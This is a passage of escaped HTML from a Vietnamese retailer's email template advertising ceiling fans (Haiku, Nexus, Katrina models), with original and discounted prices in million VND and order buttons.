style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">19.0 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_3\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-52inch-mau-caramel.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-52inch-mau-caramel.html\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763684307-cocoa_bamboo.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_9\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU H - SMART CEILING FANS<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_10\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>COCOA BAMBOO - 60\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_11\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">39.6 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup><span style=\\\"line-height: 12px;\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">32.6 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_2\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh-cao-cap-haiku-60inch-caramel-bamboo.html\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh-cao-cap-haiku-60inch-caramel-bamboo.html\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-width: 0px; border-top-style: solid; border-top-color: #CCC; border-left-width: 0px; border-left-style: solid; border-left-color: #CCC; border-right-width: 0px; border-right-style: solid; border-right-color: #CCC; border-bottom-width: 0px; border-bottom-style: solid; border-bottom-color: #CCC;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766160579-nexus-wh.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_9\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_10\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>NEXUS WH\\/BL 60\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_11\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">7.9 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">6.3 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_11\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766391705-KATRINA.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_12\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_13\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>KATRINA LED 52\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_14\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">6.5 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup><span style=\\\"line-height: 12px;\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\">5.2 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_12\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:47px; v-text-anchor:middle; width:120px;\\\" arcsize=\\\"10.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 5px;-webkit-border-radius: 5px; -moz-border-radius: 5px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:15px 25px;line-height:120%;\\\">\\u0110\\u1eb6T H\\u00c0NG<\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768098980-L-44-wh.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: 